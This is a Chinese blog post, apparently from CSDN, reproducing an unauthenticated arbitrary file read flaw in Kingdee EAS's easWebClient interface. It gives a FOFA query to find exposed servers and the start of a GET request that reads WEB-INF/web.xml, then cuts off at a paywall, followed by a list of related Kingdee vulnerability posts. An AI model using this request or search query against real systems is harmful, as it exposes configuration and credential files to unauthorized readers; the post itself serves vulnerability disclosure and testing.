金蝶EAS easWebClient接口任意文件读取

最新推荐文章于 2024-07-11 16:05:16 发布
最新推荐文章于 2024-07-11 16:05:16 发布
阅读量1k 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 漏洞复现 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_43567873/article/details/136468781
金蝶EAS是一款集团管控解决方案,但在easWebClient接口中存在未授权的任意文件读取漏洞,攻击者能读取敏感文件,如数据库和系统配置,严重影响系统安全性。影响版本包括特定的金蝶EAS版本。复现漏洞可通过构造GET请求来获取服务器配置。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

简介

金蝶EAS为集团企业提供全面集团管控方案,助力集团企业数字化转型,实现企业数据自由共享。以财务共享、数字营销、智能制造为主要领域,全面覆盖预算、管理会计、资金管理、集团供应链、销售电商、采购电商、多工厂制造等管理领域。同时,金蝶自主创新了最适合中国企业管理特质的BOS底层开放平台,满足了集团企业随需应变的创新及发展等深层次需求。

漏洞简介

金蝶EAS easWebClient接口处存在任意文件读取漏洞,未经身份验证的攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。

影响版本

金蝶Eas
Fofa:

app="Kingdee-EAS"

漏洞复现

使用以下构造的GET数据包请求服务器敏感配置文件

GET /easWebClient/deploy/client/ctrlhome/webapps/extweb/WEB-INF/web.xml HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15;
了解本专栏 订阅专栏 解锁全文 超级会员免费看
金蝶 EASEAS Cloud任意文件上传漏洞复现
0xSec
11-20 1500
金蝶 EASEAS Cloud 在 uploadLogo.action 接口处存在文件上传漏洞,攻击者可以利用文件上传漏洞执行恶意代码、写入后门、从而可能导致服务器受到攻击并被控制。
金蝶EAS pdfviewlocal.jsp接口存在任意文件读取漏洞 附POC软件
nnn2188185的博客
01-08 1043
金蝶EAS pdfviewlocal.jsp接口存在任意文件读取漏洞 附POC软件
金蝶-EAS easWebClient 任意文件读取漏洞复现
02-20 3582
金蝶-EAS是一款面向大中型企业的管理软件,涵盖了财务、人力资源、采购、库存等多个功能模块,支持云计算和个性化定制,适合集团企业管理使用。
金蝶EAS_任意文件读取
m0_64366018的博客
01-13 626
可以读取任意文件,这里只做测试,读取C:/Windows/win.ini。
金蝶云星空任意文件读取漏洞复现
08-01 1316
金蝶云星空是一款云端企业资源管理(ERP)软件,为企业提供财务管理、供应链管理以及业务流程管理等一体化解决方案。金蝶云·星空聚焦多组织,多利润中心的大中型企业,以 “开放、标准、社交”三大特性为数字经济时代的企业提供开放的 ERP 云平台。服务涵盖:财务、供应链、智能制造、阿米巴管理、全渠道营销、电商、HR、企业互联网服务,帮助企业实现数字化营销新生态及管理重构等,提升企业数字化能力。
金蝶云星空 CommonFileServer 任意文件读取漏洞复现
故事讲予风听
11-14 1464
金蝶云星空V7.X、V8.X所有私有云和混合云版本存在一个通用漏洞,攻击者可利用此漏洞获取服务器上的任意文件,包括数据库凭据、API密钥、配置文件等,从而获取系统权限和敏感信息。
金蝶EAS pdfviewlocal 任意文件读取漏洞复现
0xSec
01-08 1618
金蝶EAS pdfviewlocal接口处存在任意文件读取漏洞,未经身份验证的攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
【复现】金蝶EAS系统 文件读取漏洞_13
fushuang333的博客
01-09 2173
【复现】金蝶EAS 任意文件读取漏洞,通过提交专门设计的输入,攻击者就可以在被访问的文件系统中读取或写入任意内容,往往能够使攻击者从服务器上获取敏感信息文件,正常读取的文件没有经过校验或者不严格,用户可以控制这个变量读取任意文件
金蝶云星空任意文件读取漏洞复现(0day)
0xSec
07-31 2997
由于金蝶云星空CommonFileServer接口处权限设置不当,未经身份认证的攻击者可以利用此漏洞访问服务器上的任意文件,包括数据库凭据、API密钥、配置文件等,从而获取系统权限和敏感信息。
如何与金蝶系统进行接口对接
最新发布
qq_46132384的博客
07-11 2708
在进行接口对接时候需要根据金蝶那边传来的json字段进行分析,金蝶的新增和保存接口巨繁琐,需要特别注意,解析字段,我们需要传给金蝶什么字段数据,然后根据自己的实际情况,进行传输。通过创建请求对象并设置查询参数,然后使用 Retrofit 和 RxJava 发起网络请求并处理响应,将返回的响应赋值给。综上所述大致步骤分为创建 Retrofitv,创建 API 接口实例,发起请求,处理响应,监听状态等。
eas服务器控制台的指令
11-25 2324
/kingdee/eas705/eas/server/profiles/server1/bin sh startserver.sh debug  启动debug模式 /kingdee/eas705/eas/server/bin sh killalleas.sh  关eas进程 /kingdee/eas705/eas/admin sh admin.sh  启动服务器控制台
java导致敏感信息泄漏的异常_金蝶AES系统Java web配置文件敏感信息泄露漏洞
weixin_42123296的博客
03-09 1027
### 0x01 漏洞框架金蝶软件始创于1993年,是一家ERP、财务等企业管理软件厂商,拥有官网(kigndee.com)、友商网(youshang.com)、快递100(kuaidi100.com)、云之家(kdweibo.com)等互联网业务应用官方主页:www.kingdee.com客户案例:![](https://images.seebug.org/contribute/f1e376de...
EAS85客户端PK下实地部署
湖南长城科技的博客
01-04 300
EAS85客户端部署 部署环境:银河麒麟V4,V10参考执行。 说明:客户端为tar包解压版,暂无直接安装版本 本文客户端目录为 /diskb/kingdee/eas 1、修改/diskb/Kingdee/eas/client/bin/set-client-env.sh #!/bin/sh EAS_HOME="/diskb/Kingdee/eas" export EAS_HOME JAVA_HOME="/diskb/Kingdee/eas/jdk" export JAVA_HOME .
金蝶EAS摘要配置路径
小昌呀的EAS开发专栏
10-16 438
http://ip:port/easweb/billdigesttools/index.jsp
EAS默认登录语言的设置
Bourne-Again
11-19 1134
如上图,EAS登录时的默认语言受以下因素影响: 1、 服务器的配置文件 eas\server\deploy\fileserver.ear\easWebClient\deploy\client\config.xml (客户端启动时会下载到客户端)       这个文件里的以下代码会影响可选语言列表及顺序 <!--key的格式为"AA#BB",其中AA为EAS
金蝶EAS8.2二次开发,做webservice接口
qq_31450641的博客
01-13 6848
1.WebService接口调用及调试 2.BoswebService原理 由SAOP,WADL,以及uudi等几块技术组成,以xml格式进行数据的传输 在bos中只能发布Entity和Façade两种元数据类型.在建立webService功能时最好使用Façade 并且提供简单类型的输入和返回值. 3.webService建立 建立需要发布的façade,建立简单的业务逻辑 在设计模式点击右键...
金蝶EAS pdfviewlocal 任意文件读取漏洞
3tefanie的博客
01-09 1114
【少年不惧岁月长,彼方尚有荣光在。】
关于web.xml配置的那些事儿
weixin_34101784的博客
09-28 364
1.简介 web.xml文件是Java web项目中的一个配置文件,主要用于配置欢迎页、Filter、Listener、Servlet等,但并不是必须的,一个java web项目没有web.xml文件照样能跑起来。Tomcat容器/conf目录下也有作用于全局web应用web.xml文件,当一个web项目要启动时,Tomcat会首先加载项...
webServer tomcat5/tomcat6/tomcat7诠释
weixin_33898233的博客
12-31 1407
Jakata tomcat5 http://mirrors.ccs.neu.edu/Apache/dist/tomcat/tomcat-5/ http://archive.apache.org/dist/jakarta/tomcat-5/ http://tomcat.apache.org/ http://labs.xiaonei.com/ 由校内网维护...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值